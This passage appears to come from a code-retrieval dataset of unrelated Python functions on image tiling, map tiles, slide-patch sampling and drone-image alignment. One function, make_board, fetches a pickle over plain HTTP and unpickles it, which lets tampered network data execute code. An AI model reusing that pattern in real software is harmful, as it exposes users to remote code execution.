\"satImage_%.3d\" % i\n image_filename = filename + imageid + \".png\"\n if os.path.isfile(image_filename):\n print ('Loading ' + image_filename)\n img = mpimg.imread(image_filename)\n\n\n imgs.append(img)\n else:\n print ('File ' + image_filename + ' does not exist')\n\n num_images = len(imgs)\n IMG_WIDTH = int(imgs[0].shape[0]/DOWNSCALE)\n IMG_HEIGHT = int(imgs[0].shape[1]/DOWNSCALE)\n N_PATCHES_PER_IMAGE = (IMG_WIDTH/IMG_PATCH_SIZE)*(IMG_HEIGHT/IMG_PATCH_SIZE)\n\n\n img_patches = [img_crop_context(imgs[i], IMG_PATCH_SIZE, IMG_PATCH_SIZE,context_factor, sub_mean=True) for i in range(num_images)]\n data = [img_patches[i][j] for i in range(len(img_patches)) for j in range(len(img_patches[i]))]\n data = np.asarray(data)\n return data", "def split_image_into_tiles_of_size(arr: Image, tile_w: int, tile_h: int, overlap: int):\n x_axis = -1\n y_axis = -2\n arr_width, arr_height = arr.shape[x_axis], arr.shape[y_axis]\n\n x_ntiles = (\n arr_width // tile_w if arr_width % tile_w == 0 else (arr_width // tile_w) + 1\n )\n y_ntiles = (\n arr_height // tile_h if arr_height % tile_h == 0 else (arr_height // tile_h) + 1\n )\n\n tiles = []\n\n # row\n for i in range(0, y_ntiles):\n # height of this tile\n ver_f = tile_h * i\n ver_t = ver_f + tile_h\n\n # col\n for j in range(0, x_ntiles):\n # width of this tile\n hor_f = tile_w * j\n hor_t = hor_f + tile_w\n\n tile = get_tile(arr, hor_f, hor_t, ver_f, ver_t, overlap)\n\n tiles.append(tile)\n tile_shape = [tile_h, tile_w]\n ntiles = dict(x=x_ntiles, y=y_ntiles)\n padding = dict(left=0, right=0, top=0, bottom=0)\n if arr_width % tile_w == 0:\n padding[\"right\"] = 0\n else:\n padding[\"right\"] = tile_w - (arr_width % tile_w)\n if arr_height % tile_h == 0:\n padding[\"bottom\"] = 0\n else:\n padding[\"bottom\"] = tile_h - (arr_height % tile_h)\n info = dict(tile_shape=tile_shape, ntiles=ntiles, overlap=overlap, padding=padding)\n return tiles, info", "def convert(self):\n self.tilewidth = int(self.tilewidth)\n self.tileheight = int(self.tileheight)\n self.width = int(self.width)\n self.height = int(self.height)\n self.pixel_width = self.width * self.tilewidth\n self.pixel_height = self.height * self.tileheight\n for layer in self.layers:\n self.named_layers[layer.name] = layer\n layer.opacity = float(layer.opacity)\n layer.x = int(layer.x)\n layer.y = int(layer.y)\n layer.width = int(layer.width)\n layer.height = int(layer.height)\n layer.pixel_width = layer.width * self.tilewidth\n layer.pixel_height = layer.height * self.tileheight\n layer.visible = bool(int(layer.visible))\n for tile_set in self.tile_sets:\n self.named_tile_sets[tile_set.name] = tile_set\n tile_set.spacing = int(tile_set.spacing)\n tile_set.margin = int(tile_set.margin)\n for img in tile_set.images:\n if img.trans:\n img.trans = (int(img.trans[:2], 16), int(img.trans[2:4], 16), int(img.trans[4:], 16))\n for obj_group in self.object_groups:\n obj_group.x = int(obj_group.x)\n obj_group.y = int(obj_group.y)\n obj_group.width = int(obj_group.width)\n obj_group.height = int(obj_group.height)\n for map_obj in obj_group.objects:\n map_obj.x = int(map_obj.x)\n map_obj.y = int(map_obj.y)\n map_obj.width = int(map_obj.width)\n map_obj.height = int(map_obj.height)", "def convert(self):\n self.tilewidth = int(self.tilewidth)\n self.tileheight = int(self.tileheight)\n self.width = int(self.width)\n self.height = int(self.height)\n self.pixel_width = self.width * self.tilewidth\n self.pixel_height = self.height * self.tileheight\n for layer in self.layers:\n self.named_layers[layer.name] = layer\n layer.opacity = float(layer.opacity)\n layer.x = int(layer.x)\n layer.y = int(layer.y)\n layer.width = int(layer.width)\n layer.height = int(layer.height)\n layer.pixel_width = layer.width * self.tilewidth\n layer.pixel_height = layer.height * self.tileheight\n layer.visible = bool(int(layer.visible))\n for tile_set in self.tile_sets:\n self.named_tile_sets[tile_set.name] = tile_set\n tile_set.spacing = int(tile_set.spacing)\n tile_set.margin = int(tile_set.margin)\n for img in tile_set.images:\n if img.trans:\n img.trans = (int(img.trans[:2], 16), int(img.trans[2:4], 16), int(img.trans[4:], 16))\n for obj_group in self.object_groups:\n obj_group.x = int(obj_group.x)\n obj_group.y = int(obj_group.y)\n obj_group.width = int(obj_group.width)\n obj_group.height = int(obj_group.height)\n for map_obj in obj_group.objects:\n map_obj.x = int(map_obj.x)\n map_obj.y = int(map_obj.y)\n map_obj.width = int(map_obj.width)\n map_obj.height = int(map_obj.height)", "def collect_patches(tif, mask, lev1, lev2, num_per_img, patch_size, patch_centre, save_folder, num_random_sample):\n table=pd.DataFrame(columns=['slide_name','x','y','label'])\n # init output lists\n patch_images_lev1 = []\n patch_images_lev2 = []\n patch_labels = []\n\n num_cancer = 0\n num_health = 0\n\n # file paths\n slide_path = tif\n mask_path = mask\n f_num = slide_path.split('/')[-1].split('.')[0]\n slide_name=os.path.basename(slide_path).rstrip('.tif')\n\n # get images with OpenSlide\n slide = open_slide(slide_path)\n tumor_mask = open_slide(mask_path)\n\n # read level 4 slide image and mask - for the purposes of getting healthy\n # and tumor pixels\n # 读取slide和mask,read_slide就是返回一shape == (height, width, 3) #3:rgb\n slide_image = read_slide(slide,\n x=0,\n y=0,\n level=4,\n width=tumor_mask.level_dimensions[4][0],\n height=tumor_mask.level_dimensions[4][1])\n\n mask_image = read_slide(tumor_mask,\n x=0,\n y=0,\n level=4,\n width=tumor_mask.level_dimensions[4][0],\n height=tumor_mask.level_dimensions[4][1])\n\n\n\n print('--------checking mask image shape after read slide', mask_image.shape)\n print('--------checking slide_image shape after read slide', slide_image.shape)\n mask_image = mask_image[:, :, 0]\n # print ('--------checking mask image shape after mask_image[:, :, 0]', mask_image.siz)\n\n # get a list of tumor pixels at level 4\n mask_lev_4_cancer = np.nonzero(mask_image)\n # print ('checking length of mask_lev_4_cancer', mask_lev_4_cancer)\n\n # make a healthy tissue mask by subtracting tumor mask from tissue mask\n tissue_pixels = find_tissue_pixels(slide_image)\n # print ('---checking tissue_pixels ', tissue_pixels )\n tissue_regions = apply_mask(slide_image, tissue_pixels)\n # print ('------checking tissue_regions', tissue_regions)\n\n mask_health = tissue_regions[:, :, 0] - mask_image\n # print ('------checking mask_health = tissue_regions[:, :, 0] - mask_image-------', mask_health.shape)\n mask_health = mask_health > 0\n # print ('------checking mask_health = mask_health > 0---------', mask_health.shape)\n mask_health = mask_health.astype('int')\n # print ('------checking mask_health = mask_health.astypeint-------', mask_health.shape)\n\n # get a list of healthy pixels at level 4\n mask_lev_4_health = np.nonzero(mask_health)\n # print ('------checking mask_lev_4_health----', len(mask_lev_4_health[0]))\n\n # print()\n # print('lenmask_lev_4_cancerpatch_size ** 2, lenmask_lev_4_health0patch_size ** 2:',\n # len(mask_lev_4_cancer[0]) // (patch_size ** 2), len(mask_lev_4_health[0]) // (patch_size ** 2))\n\n # -------------------------------------------------------------\n if len(mask_lev_4_cancer[0]) != 0:\n print('extracting tumor patches------')\n #logging.info('extracting tumor patches')\n # extract TUMOR patches\n\n # get a random sample of tumor pixels\n # Note: did random.sample here rather than random.choice inside the while loop because os speed\n random_sample = min(len(list(zip(mask_lev_4_cancer[1], mask_lev_4_cancer[0])))-1,num_random_sample)\n sample_cancer = random.sample(list(zip(mask_lev_4_cancer[1], mask_lev_4_cancer[0])), random_sample)\n\n c = 0\n idx= 0\n # continue until enough patches extracted\n while num_cancer < num_per_img:\n c += 1\n if c == random_sample:\n break\n # print('-----checking-------c', c)\n # if c % 10 == 0:\n # print(c, end=', ')\n\n # get the next pixel from the sample - coordinates at level4\n (x4, y4) = sample_cancer[c]\n\n # convert level 4 coordinates to level 0\n x0 = x4 * (2 ** 4)\n y0 = y4 * (2 ** 4)\n \n # extract patches at lev1 CENTERED at that pixel\n patch_image_lev1, patch_mask_lev1, patch_tissue_lev1 = \\\n get_patches(slide, tumor_mask, lev1, x0, y0, patch_size)\n\n # calc tissue ratio in that patch\n tissue_ratio = np.sum(patch_tissue_lev1[:, :, 0]) / (patch_size ** 2)\n\n # double-check if the patch has tumor\n has_cancer = check_patch_centre(patch_mask_lev1, patch_centre)\n\n # if it has more than 50% tissue and has tumor\n if (tissue_ratio > 0.5) & has_cancer:\n # collect lev1 patch\n num_cancer += 1\n table.loc[idx]=(slide_name,x0,y0,1)\n idx+=1\n\n # -------------------------------------------------------------\n # extract HEALTHY patches\n # repeat the above for the healthy pixels\n print('extracting normal patches------')\n #logging.info('extracting normal patches')\n\n # print()\n # get a random sample of healthy pixels\n random_sample = min(len(list(zip(mask_lev_4_health[1], mask_lev_4_health[0])))-1, num_random_sample)\n sample_health = random.sample(list(zip(mask_lev_4_health[1], mask_lev_4_health[0])), random_sample)\n # print('-------checking sample_health------', len(sample_health))\n\n c = 0\n\n # get healthy images\n while num_health < num_per_img:\n c += 1\n if c == random_sample:\n break\n # if c % 10 == 0:\n # print(c, end=', ')\n\n # get the next pixel from the sample - coordinates at level 4\n (x4, y4) = sample_health[c]\n\n # convert level 4 coordinates to level 0\n x0 = x4 * (2 ** 4)\n y0 = y4 * (2 ** 4)\n\n # extract patches at lev1 CENTERED at that pixel\n patch_image_lev1, patch_mask_lev1, patch_tissue_lev1 = \\\n get_patches(slide, tumor_mask, lev1, x0, y0, patch_size)\n\n # calc tissue ratio in that patch\n tissue_ratio = np.sum(patch_tissue_lev1[:, :, 0]) / (patch_size ** 2)\n\n # check if the patch has tumor\n has_cancer = check_patch_centre(patch_mask_lev1, patch_centre)\n\n # if it has more than 50% tissue and doens't have tumor in the 128x128 centre\n if (tissue_ratio > 0.5) & (not has_cancer):\n\n # collect lev1 patch\n num_health += 1\n table.loc[idx]=(slide_name,x0,y0,0)\n idx+=1\n table.to_csv(save_folder,header=True)\n return table", "def generate_image_grid(sess, df, filenames,op, op2):\n #x_points = np.arange(0, 1, 1.5).astype(np.float32)\n #y_points = np.arange(0, 1, 1.5).astype(np.float32)\n\n nx, ny = 12, 1\n #plt.subplot()\n gs = gridspec.GridSpec(nx, ny, hspace=1, wspace=0.05)\n # input_x = sess.run(op2, feed_dict={x_input: df[0:24]})\n #\n # plt.imshow(np.array(df[0].tolist()).reshape(28, 28), cmap='gray')\n # plt.show()\n # x = sess.run(op, feed_dict={decoder_input: input_x[0].reshape(1,2)})\n # img = np.array(x.tolist()).reshape(28, 28)\n #\n # plt.imshow(img, cmap='gray')\n # plt.show()\n\n \"\"\" grid \"\"\"\n input_x = sess.run(op2, feed_dict={x_input: df[0:24]})\n for i, g in enumerate(gs):\n\n x = sess.run(op, feed_dict={decoder_input: input_x[i].reshape(1,2)})\n ax = plt.subplot(g)\n img = np.array(x.tolist()).reshape(28, 28)\n ax.imshow(img, cmap='gray')\n ax.set_xticks([])\n ax.set_yticks([])\n #ax.set_aspect('auto')\n ax.set_title(filenames[i])\n plt.show()\n\n for i, g in enumerate(gs):\n\n ax = plt.subplot(g)\n img = np.array(df[i].tolist()).reshape(28, 28)\n ax.imshow(img, cmap='gray')\n ax.set_xticks([])\n ax.set_yticks([])\n #ax.set_aspect('auto')\n ax.set_title(filenames[i])\n plt.show()", "def test_tiled_iterator_nogen(self):\n tile_no_gen = TiledIterator(\n twod_image=self.test_file_1, overlap_log_2=0\n )\n tile = next(tile_no_gen)\n\n shape = tile.shape\n\n # defaults\n self.assertTrue(shape[0] == 32)\n self.assertTrue(shape[1] == 65)\n self.assertTrue(shape[2] == 65)\n self.assertTrue(shape[3] == 1)\n\n #\n img0 = self.test_data_1[0:65, 0:65]\n np.array_equal(tile, img0)\n\n # no overlap\n tile = next(tile_no_gen)\n img0 = self.test_data_1[65 : 2 * 65, 65 : 2 * 65]\n np.array_equal(tile, img0)\n\n # --- overlapping --- #\n tile_no_gen = TiledIterator(\n twod_image=self.test_file_1, overlap_log_2=2\n )\n\n tile = next(tile_no_gen)\n\n shape = tile.shape\n\n # defaults\n self.assertTrue(shape[0] == 32)\n self.assertTrue(shape[1] == 65)\n self.assertTrue(shape[2] == 65)\n self.assertTrue(shape[3] == 1)\n\n #\n img0 = self.test_data_1[0:65, 0:65]\n np.array_equal(tile, img0)\n\n # 64/(2**2) = 16\n tile = next(tile_no_gen)\n img0 = self.test_data_1[16 : 16 + 65, 16 : 16 + 65]\n np.array_equal(tile, img0)", "def process(self, step_guess_orientation=True, step_advanced_alignement=True,\n step_gen_worldfiles=True, step_load_worldfiles=True,\n step_gen_vrts=True, step_load_vrts=True,\n step_load_debug=True ):\n\n QgsMessageLog.logMessage(\"1/ Instantiating all images...\", \"QuickDroneMap\", 0)\n for root, dirs, files in os.walk(self.folder):\n for file in files:\n if file.endswith(\".jpg\") or file.endswith(\".JPG\"):\n image_path = os.path.join(root, file)\n image = Image(self, image_path)\n self.images.append(image)\n self.images = self.images[70:90]\n # for i in [301,300,329]: # 3 images, transform fails on all of them\n # for i in [397,398,364]: # 3 images, transform fails on one of them\n # for i in [377,380,381]: # 3 images, transform works on all of them\n # path = \"C:\\\\Users\\\\Olivier\\\\Dropbox\\\\Affaires\\\\SPC\\\\Sources\\\\quickdronemap\\\\test\\\\data\\\\DJI_{0:04d}.JPG\".format(i)\n # self.images.append(Image(self, path))\n\n QgsMessageLog.logMessage(\"2/ Assigning ids\", \"QuickDroneMap\", 0)\n for i, image in enumerate(self.images):\n image.id = i\n\n\n QgsMessageLog.logMessage(\"2/ Loading image attributes and parsing exif tags...\", \"QuickDroneMap\", 0)\n for image in self.images:\n image.set_attributes()\n\n if step_guess_orientation:\n QgsMessageLog.logMessage(\"3/ Building image sequences...\", \"QuickDroneMap\", 0)\n sorted_images = sorted(self.images, key=lambda x: x.timestamp)\n for i in range(len(sorted_images)):\n\n prev_image = sorted_images[i-1] if i>0 else None\n image = sorted_images[i]\n next_image = sorted_images[i+1] if i<len(sorted_images)-1 else None\n\n if prev_image is None or next_image is None:\n continue\n\n angle_p_i = math.atan2(image.point.x()-prev_image.point.x(),-image.point.y()+prev_image.point.y())\n angle_i_n = math.atan2(next_image.point.x()-image.point.x(),-next_image.point.y()+image.point.y())\n\n # Checking if the three images are aligned (if not, we're probably at an angle)\n dA = absolute_angle_difference(angle_p_i, angle_i_n)\n if dA > ANGLE_THRESHOLD:\n continue\n\n # Checking if the three images are near enough timewise, if not, it could be separate flights\n dT1 = image.timestamp - prev_image.timestamp\n dT2 = next_image.timestamp - image.timestamp\n if dT1 > TIME_THRESHOLD or dT2 > TIME_THRESHOLD:\n continue\n\n prev_image.next_image = image\n image.prev_image = prev_image\n image.next_image = next_image\n next_image.prev_image = image\n\n QgsMessageLog.logMessage(\"4/ Deriving orientation from image sequence\", \"QuickDroneMap\", 0)\n for image in self.images:\n # if the direction wasn't set in the Exif tags, we derive it from the image sequences\n if image.direction is None:\n img_a = image.prev_image or image \n img_b = image.next_image or image\n image.angle = math.atan2(img_b.point.x()-img_a.point.x(),-img_b.point.y()+img_a.point.y())\n\n if step_advanced_alignement:\n QgsMessageLog.logMessage(\"5/ Building image neighbourhood graph...\", \"QuickDroneMap\", 0)\n from scipy.spatial import Delaunay\n points = [(i.point.x(),i.point.y()) for i in self.images]\n triangulation = Delaunay(points)\n\n done = [[False for _i2 in self.images] for _i1 in self.images]\n for tri in triangulation.simplices:\n i1,i2,i3 = tri\n if not done[i1][i2]:\n e = Edge(self.images[i1], self.images[i2])\n self.edges.append(e)\n self.images[i1].edges.append(e)\n self.images[i2].edges.append(e)\n done[i1][i2] = True\n if not done[i1][i3]:\n e = Edge(self.images[i1], self.images[i3])\n self.edges.append(e)\n self.images[i1].edges.append(e)\n self.images[i3].edges.append(e)\n done[i1][i3] = True\n if not done[i2][i3]:\n e = Edge(self.images[i2], self.images[i3])\n self.edges.append(e)\n self.images[i2].edges.append(e)\n self.images[i3].edges.append(e)\n done[i2][i3] = True\n\n QgsMessageLog.logMessage(\"6/ Computing similarities\", \"QuickDroneMap\", 0)\n for i, edge in enumerate(self.edges):\n QgsMessageLog.logMessage(\"Done {} out of {}\".format(i,len(self.edges)), \"QuickDroneMap\", 0)\n QApplication.processEvents()\n edge.compute_transform()\n\n # initial_guess_np, _ = self.get_initial_values_and_bounds()\n # QgsMessageLog.logMessage(\"Initial fitness is {}\".format(self.calculate_fitness(initial_guess_np)), \"QuickDroneMap\", 0)\n\n # print(\"TESTING QUALITY OF SIMILARITY (disable optimization to do this)\")\n # done = []\n # edges_to_delete = []\n # for edge in self.edges:\n # QApplication.processEvents()\n\n # if edge.imageA in done or edge.imageB in done:\n # edges_to_delete.append(edge)\n # continue\n\n # done.append(edge.imageA)\n # done.append(edge.imageB)\n\n # d_angle = edge.angle\n # edge.imageB.angle = edge.imageA.angle + d_angle\n\n # f_scale = edge.scale\n # edge.imageB.scale = edge.imageA.scale * f_scale\n\n # d_point = QgsPointXY(edge.tvec[0],edge.tvec[1])\n # d_point = d_point.rotated(edge.imageA.angle)\n # d_point *= edge.imageA.pixel_size/DOWNSCALING_FACTOR\n # edge.imageB.point = edge.imageA.point + d_point\n # for edge in edges_to_delete:\n # self.edges.remove(edge)\n\n\n # print(\"AFTER PROTOTYPE PLACEMENT\")\n # initial_guess_np, _ = self.get_initial_values_and_bounds()\n # self.calculate_fitness(initial_guess_np)\n\n\n QgsMessageLog.logMessage(\"7/ Optimizing\", \"QuickDroneMap\", 0)\n QApplication.processEvents()\n\n initial_guess_np, bounds = self.get_initial_values_and_bounds() \n # res_1 = least_squares(calculate_fitness, initial_guess_np, bounds=([b[0] for b in bounds],[b[1] for b in bounds]))\n res_1 = minimize(self.calculate_fitness, initial_guess_np, bounds=bounds)\n\n for image in self.images:\n px = res_1.x[image.id*4+0]\n py = res_1.x[image.id*4+1]\n pa = res_1.x[image.id*4+2]\n ps = res_1.x[image.id*4+3]\n image.point = QgsPointXY(px, py)\n image.angle = pa\n image.psize = ps\n\n initial_guess_np, _ = self.get_initial_values_and_bounds()\n QgsMessageLog.logMessage(\"After optimization fitness is {}\".format(self.calculate_fitness(initial_guess_np)), \"QuickDroneMap\", 0)\n \n QgsMessageLog.logMessage(\"8/ Computing all transforms...\", \"QuickDroneMap\", 0)\n for image in self.images:\n image.update_transform()\n\n if step_gen_worldfiles:\n QgsMessageLog.logMessage(\"9a/ Creating and loading worldfiles\", \"QuickDroneMap\", 0)\n for image in self.images:\n image.write_worldfile()\n if step_load_worldfiles:\n image.load_worldfile(self.iface)\n\n if step_gen_vrts:\n QgsMessageLog.logMessage(\"9b/ Creating and loading vrts\", \"QuickDroneMap\", 0)\n for image in self.images:\n image.write_vrt()\n if step_load_vrts:\n image.load_vrt(self.iface)\n\n if step_load_debug:\n QgsMessageLog.logMessage(\"10/ Creating debug jsons files\", \"QuickDroneMap\", 0)\n edg_data = {\"type\": \"FeatureCollection\",\"features\": [], \"crs\": {\"type\": \"EPSG\",\"properties\": {\"code\": 32628}}} # TODO : use self.crs\n for edge in self.edges:\n coords = [[edge.imageA.point.x(), edge.imageA.point.y()],[edge.imageB.point.x(), edge.imageB.point.y()]]\n props = {k:v for (k,v) in vars(edge).items()}\n props['angle_a'] = edge.imageA.angle\n props['angle_b'] = edge.imageB.angle\n feature = {\"type\": \"Feature\",\"properties\": props,\"geometry\": {\"type\": \"LineString\",\"coordinates\": coords}}\n edg_data['features'].append(feature)\n \n edg_file = tempfile.NamedTemporaryFile(mode='w+', suffix='.geojson', delete=False)\n json.dump(edg_data, edg_file, default=lambda o: str(o))\n edg_file.close()\n layer = self.iface.addVectorLayer(edg_file.name,\"[DEBUG] Edges\",\"ogr\")\n layer.loadNamedStyle(os.path.join(os.path.dirname(os.path.realpath(__file__)),'debug_edges_style.qml'))\n \n graph_data = {\"type\": \"FeatureCollection\",\"features\": [], \"crs\": {\"type\": \"EPSG\",\"properties\": {\"code\": 4326}}} # TODO : use self.crs\n for edge in self.edges:\n coords = [[edge.imageA.lon, edge.imageA.lat],[edge.imageB.lon, edge.imageB.lat]]\n props = {k:v for (k,v) in vars(edge).items()}\n feature = {\"type\": \"Feature\",\"properties\": props,\"geometry\": {\"type\": \"LineString\",\"coordinates\": coords}}\n graph_data['features'].append(feature)\n\n graph_file = tempfile.NamedTemporaryFile(mode='w+', suffix='.geojson', delete=False)\n json.dump(graph_data, graph_file, default=lambda o: str(o))\n graph_file.close()\n layer = self.iface.addVectorLayer(graph_file.name,\"[DEBUG] Graph\",\"ogr\")\n layer.loadNamedStyle(os.path.join(os.path.dirname(os.path.realpath(__file__)),'debug_graph_style.qml'))", "def images_steps(login, horizon):\n return ImagesSteps(horizon)", "def buildTiles(self, items, attributes):\n pass", "def show_images(images, level,cols = 1,titles = None):\n assert((titles is None)or (len(images) == len(titles)))\n n_images = len(images)\n if titles is None: titles = ['Image (%d)' % i for i in range(1,n_images + 1)]\n fig = plt.figure()\n for n, (image, title) in enumerate(zip(images, titles)):\n a = fig.add_subplot(cols, np.ceil(n_images/float(cols)), n + 1)\n if image.ndim == 2:\n plt.gray()\n plt.imshow(image)\n a.set_title(title)\n fig.set_size_inches(np.array(fig.get_size_inches()) * n_images)\n plt.savefig(\"SteerablePyramid/level\"+ str(level) +\".png\")\n plt.clf()", "def generate_overview_tiles(self):\n\n gdal.SetConfigOption(\"GDAL_PAM_ENABLED\", \"NO\")\n\n print \"Generating Overview Tiles:\"\n\n if self.options.profile == 'garmin': # no overview tiles for 'garmin'\n return\n # Usage of existing tiles: from 4 underlying tiles generate one as overview.\n\n tcount = 0\n zcount = 0\n for tz in range(self.tmaxz-1, self.tminz-1, -1):\n tminx, tminy, tmaxx, tmaxy = self.tminmax[tz]\n tcount += (1+abs(tmaxx-tminx)) * (1+abs(tmaxy-tminy))\n zcount+=1\n if self.options.resume:\n count_tiles=tcount\n zcount+=1\n tminx, tminy, tmaxx, tmaxy = self.tminmax[self.tmaxz]\n count_tiles += (1+abs(tmaxx-tminx)) * (1+abs(tmaxy-tminy))\n i_count = self.tile_exists(0, 0, 0,1)\n if i_count == count_tiles:\n if self.options.verbose:\n print \"\\tTile generation skipped because of --resume ; all-tiles [\",zcount,\"] zoom-levels with tiles[\",count_tiles,\"]\"\n return\n ti = 0\n\n # querysize = tilesize * 2\n\n for tz in range(self.tmaxz-1, self.tminz-1, -1):\n tminx, tminy, tmaxx, tmaxy = self.tminmax[tz]\n i_x_column_count=((tmaxx-tminx)+1)\n i_y_column_count=((tmaxy-tminy)+1)\n if self.options.verbose:\n # tx in range(tminx, tmaxx+1) tminx[ 140798 ] tmaxx[ 140872 ] ; ((tmaxx-tmaxy)+1) x_tiles[ -35331 ]\n print \"\\ttz=[\",tz,\"] : tx in range(tminx, tmaxx+1) tminx[\",tminx,\"] tmaxx[\",tmaxx,\"] ; ((tmaxx-tminx)+1) x_tiles[\",i_x_column_count,\"]\"\n # ty_tms in range(tmaxy, tminy-1, -1) tmaxy[ 176204 ] tminy[ 176126 ] ; ((tmaxy-tminy)) y_tiles[ 78 ]\n print \"\\ttz=[\",tz,\"] :ty_tms in range(tmaxy, tminy-1, -1) tmaxy[\",tmaxy,\"] tminy[\",tminy,\"] ; ((tmaxy-tminy)) y_tiles[\",i_y_column_count,\"]\"\n if self.options.resume:\n i_count = self.tile_exists(0, 0, tz,2)\n print \"\\tTile generation skipped because of --??? ; x/y-tiles of z[\",tz,\"] x/y_tiles[\",tcount,\"] i_count[\",i_count,\"]\"\n if i_count == tcount:\n if self.options.verbose:\n print \"\\tTile generation skipped because of --resume ; x/y-tiles of z[\",tz,\"] x/y_tiles[\",tcount,\"]\"\n break\n for tx in range(tminx, tmaxx+1):\n tmaxy_work=tmaxy\n if self.options.resume:\n i_count = self.tile_exists(tx, 0, tz,3)\n print \"\\tTile generation skipped because of --??? ; z =\",tz,\" ; y-tiles of x[\",tx,\"] y_tiles[\",i_y_column_count,\"] i_count[\",i_count,\"]\"\n if i_count == i_y_column_count:\n if self.options.verbose:\n print \"\\tTile generation skipped because of --resume ; z =\",tz,\" ; y-tiles of x[\",tx,\"] y_tiles[\",i_y_column_count,\"]\"\n break\n else:\n if i_count > 0:\n # this assums the rows are compleate, which may NOT be true 18-140798-176204.jpg\n tmaxy_work-=i_count\n if self.options.verbose:\n print \"\\tTile generation skipped to tmaxy[\",tmaxy_work,\"] because of --resume ; z =\",tz,\" ; y-tiles of x[\",tx,\"] y_tiles[\",i_y_column_count,\"]\"\n for ty_tms in range(tmaxy_work, tminy-1, -1): #range(tminy, tmaxy+1):\n ty_osm=self.flip_y(tz,ty_tms)\n ty=ty_tms\n if self.options.tms_osm:\n ty=ty_osm\n if self.stopped:\n if self.options.mbtiles:\n if self.mbtiles_db:\n self.mbtiles_db.close_db()\n self.mbtiles_db=None\n break\n\n ti += 1\n\n if self.options.resume:\n exists = self.tile_exists(tx, ty, tz,0)\n if exists and self.options.verbose:\n print \"\\tTile generation skipped because of --resume\"\n else:\n exists = False\n\n if not exists:\n if self.options.verbose:\n print ti, '/', tcount, self.get_verbose_tile_name(tx, ty, tz)\n try:\n self.write_overview_tile(tx, ty, tz,self.options.tms_osm)\n except ImageOutputException, e:\n self.error(\"'%d/%d/%d': %s\" % (tz, tx, ty, e.message))\n\n if not self.options.verbose or self.is_subprocess:\n self.progressbar( ti / float(tcount) )\n if self.options.mbtiles:\n if self.mbtiles_db:\n self.mbtiles_db.close_db()\n self.mbtiles_db=None", "def iter_grid_tiles(self):\n all_points = self.grid[0].union(self.grid[1], self.grid[2], {self.position})\n min_x = min(p.x for p in all_points)\n min_y = min(p.y for p in all_points)\n\n if min_x < 0:\n xoffset = -min_x\n elif min_x == 0:\n xoffset = 0\n elif min_x > 0:\n xoffset = min_x\n if min_y < 0:\n yoffset = -min_y\n elif min_y == 0:\n yoffset = 0\n elif min_y > 0:\n yoffset = min_y\n origin = Point(0 + xoffset, 0 + yoffset)\n position = Point(self.position.x + xoffset, self.position.y + yoffset)\n for tile_type in (0, 1, 2):\n for point in self.grid[tile_type]:\n newpoint = Point(point.x + xoffset, point.y + yoffset)\n if newpoint not in (origin, position):\n yield newpoint.x, newpoint.y, tile_type\n yield origin.x, origin.y , 4\n yield position.x, position.y, 3", "def createTiles():\n Renderer.Clear()\n map = []\n w, h = len(testmap[0]), len(testmap)\n x, y = 0, 0\n for row in testmap:\n for char in row:\n map.append(makeTile(char, x, y))\n x += 1\n y += 1\n x = 0\n\n return map, w, h", "def batch(img_path, gt_path,img_list, batch, total_size, label_list):\r\n\r\n image_list = [os.path.join(img_path, i) for i in img_list]\r\n gt_list = [os.path.join(gt_path,i) for i in img_list]\r\n\r\n \r\n for i in range(0, total_size, batch):\r\n yield image_load_resize(image_list[i:i+batch]), make_label_map(gt_list[i:i+batch], label_list)", "def sample_tiles(self, fc, image_spec, export_radius, tags=None):\n image_spec, output_bands = self._get_image_spec_helper(image_spec, tags)\n fc = add_imagery(fc, image_spec, output_size=export_radius)\n return fc, output_bands", "def make_board(self):\n http = urllib3.PoolManager()\n r = http.request('GET', 'http://www.cse.msu.edu/~ruppmatt/itm891/tiles.pickle')\n tiles = pickle.loads(r.data)\n self.assets = tiles\n self.gameboard = Image.new('RGBA', (64*(self.world_width+2), 64*(self.world_height+2)))\n # Laydown land\n for c in range(0,self.world_width):\n for r in range(0, self.world_height):\n x = (c+1)*64\n y = (r+1)*64\n tile_ndx = np.random.choice(len(tiles['land']))\n self.gameboard.paste(tiles['land'][tile_ndx], (x,y)) \n # Laydown water\n for c in range(0,self.world_width):\n x = (c+1)*64\n yy = (self.world_height+1)*64\n self.gameboard.paste(tiles['water']['edge_north'], (x,0))\n self.gameboard.paste(tiles['water']['edge_south'], (x, yy))\n for r in range(0,self.world_height):\n y = (r+1)*64\n xx = (self.world_width+1)*64\n self.gameboard.paste(tiles['water']['edge_west'], (0,y))\n self.gameboard.paste(tiles['water']['edge_east'], (xx,y))\n self.gameboard.paste(tiles['water']['corner_nw'], (0,0))\n self.gameboard.paste(tiles['water']['corner_sw'], (0,(self.world_height+1)*64))\n self.gameboard.paste(tiles['water']['corner_ne'], ((self.world_width+1)*64,0))\n self.gameboard.paste(tiles['water']['corner_se'], ((self.world_width+1)*64,(self.world_height+1)*64))\n \n # Some land lines\n draw = ImageDraw.Draw(self.gameboard)\n for c in range(0,self.world_width-1):\n y_1 = 64\n y_2 = 64*(self.world_height+1)\n x = (2+c)*64\n draw.line([(x,y_1),(x,y_2)], fill='white', width=1)\n for r in range(0,self.world_height-1):\n y = (2+r)*64\n x_1= 64\n x_2 = 64 * (self.world_width+1)\n draw.line([(x_1,y),(x_2,y)], fill='white', width=1)\n return", "def stitch_map(tiles, width, height, bbox, dpi):\n size = (int(width * dpi_to_dpmm(dpi)), int(height * dpi_to_dpmm(dpi)))\n background = Image.new('RGBA', size, (255, 255, 255))\n for layer in tiles:\n layer_img = Image.new(\"RGBA\", size)\n for (x, y), tile_path in layer.items():\n tile = Image.open(tile_path)\n layer_img.paste(tile, ((x - bbox.min.x) * TILE_SIZE, (y - bbox.min.y) * TILE_SIZE))\n background = Image.alpha_composite(background, layer_img)\n add_scales_bar(background, bbox)\n return background.convert(\"RGB\")", "def generate_tile(self, tms_x, tms_y, tms_z, arguments):\n pass", "def getimgs():", "def test_unbounded_tileset_image(self):\n\t\t# Create an 8x6 tileset image placeholder\n\t\tself.expected_tile_width = 8\n\t\tself.expected_tile_height = 6\n\t\tself.expected_rows = self.expected_tile_height\n\t\tself.expected_cols = self.expected_tile_width\n\n\t\tself.test_image = dummy_image(self.expected_width(), self.expected_height())\n\t\tself.test_image_grid = TextureGrid(ImageGrid(self.test_image, self.expected_rows, self.expected_cols))\n\n\t\t# Test creating a TilesetImage without specifying dimensions\n\t\tself.tileset_image = TilesetImage(self.test_image)\n\n\t\tself.assert_tileset_image('Rows and columns not specified.')", "def split_image_into_number_of_tiles(\n arr: Image, x_ntiles: int, y_ntiles: int, overlap: int\n):\n img_width, img_height = 